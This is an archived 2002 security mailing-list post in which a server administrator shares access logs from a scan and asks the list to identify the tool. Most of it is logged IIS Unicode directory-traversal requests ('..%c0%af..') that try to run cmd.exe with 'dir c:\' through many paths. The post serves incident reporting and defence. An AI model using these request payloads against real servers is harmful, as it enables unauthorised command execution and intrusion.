Strange scans

From: Brenna Primrose (drxlecterat_private)
Date: Mon Apr 15 2002 - 08:30:22 PDT
Next message: Greg Estabrooks: "Re: Redhat 6.2 Honeypot Hacked"
Previous message: Benjamin Tomhave: "RE: <victim>server formmail.pl exploit in the wild"
Next in thread: Ed Moyle: "RE: Strange scans"
Reply: Ed Moyle: "RE: Strange scans"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Someone scanned our servers for vulnerabilities early yesterday morning.
I am not sure what program they are using and I was wondering if anyone
has seen this before.  I know it's not LANguard, Retina, Super Scan,
etc.

It's fairly obvious they were looking for IIS and other vulnerabilities,
but why does "GET http://www.microsoft.com/ HTTP/1.0" appear in it?

217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:55:53 -0500] "GET /
HTTP/1.0" 200 15479 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:57:04 -0500] "GET http://www.microsoft.com/ HTTP/1.0"
404 2440 "" "" 217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:12
-0500] "HEAD / HTTP/1.0" 200 - "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:13 -0500] "OPTIONS / HTTP/1.0" 403 2413 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:14 -0500] "GET
/invalidfilename.htm HTTP/1.0" 404 2440 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:17 -0500] "GET
/invalidfilename.cgi HTTP/1.0" 404 2440 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:18 -0500] "GET
/../invalidfilename.htm HTTP/1.0" 400 2458 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:20 -0500] "GET
/invalidfilename.htm HTTP/1.0" 404 2440 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:26 -0500] "GET
/invalidfilename.cgi HTTP/1.0" 404 2440 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:28 -0500] "GET
/../invalidfilename.htm HTTP/1.0" 400 2458 "" "" 217.225.211.209
gsa.creighton.edu - [14/Apr/2002:07:58:31 -0500] "GET /cgi-bin/
HTTP/1.0" 404 2440 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:32 -0500] "GET /cgi-bin/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:34 -0500] "GET
/iisadmpwd/ HTTP/1.0" 404 2440 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:35 -0500] "GET /iisadmpwd/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:36 -0500] "GET
/_vti_bin/ HTTP/1.0" 302 2419 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:38 -0500] "GET /msadc/ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:39 -0500] "GET
/scripts/ HTTP/1.0" 302 2419 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:41 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419
"" "" 217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:43 -0500]
"GET /scripts/..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0"
302 2419 "" "" 217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:45
-0500] "GET /scripts/..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 302 2419 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:47 -0500] "GET
/scripts/..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419
"" "" 217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:49 -0500]
"GET /scripts/..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0"
302 2419 "" "" 217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:51
-0500] "GET /scripts/..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 302 2419 "" "" 217.225.211.209 gsa.creighton.edu -
[14/Apr/2002:07:58:53 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:55 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:57 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir
+c:\ HTTP/1.0" 302 2419 "" ""
147.134.41.18 gsa.creighton.edu - [14/Apr/2002:07:58:58 -0500] "HEAD /
HTTP/1.0" 200 - "" "WhatsUp_Gold/7.0" 217.225.211.209 gsa.creighton.edu
- [14/Apr/2002:07:59:00 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:02 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:04 -0500] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:06 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:08 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:10 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:12 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:15 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:17 -0500] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c
+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:19 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:21 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:23 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:25 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:27 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:33 -0500] "GET
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c
+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:38 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:40 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:42 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:44 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c
:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:46 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:49 -0500] "GET
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:51 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+
c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:54 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:56 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+d
ir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:02 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c
:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:04 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:06 -0500] "GET
/samples/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:08 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
r+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:10 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:12 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c
+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:15 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir
+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:17 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+
dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:19 -0500] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/
c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:22 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:24 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:26 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:28 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:34 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:36 -0500] "GET
/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\
HTTP/1.0" 404 2440 "" ""

ISP has been contacted but only automated replies have been sent back to
me.

Brenna

AIM - abosolut x psycho
Yahoo! - absolut_contagion
ICQ - 1363187
http://gsa.creighton.edu
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
G e* h- r++ x+ 
------END GEEK CODE BLOCK------







----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Greg Estabrooks: "Re: Redhat 6.2 Honeypot Hacked"
Previous message: Benjamin Tomhave: "RE: <victim>server formmail.pl exploit in the wild"
Next in thread: Ed Moyle: "RE: Strange scans"
Reply: Ed Moyle: "RE: Strange scans"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Mon Apr 15 2002 - 10:37:18 PDT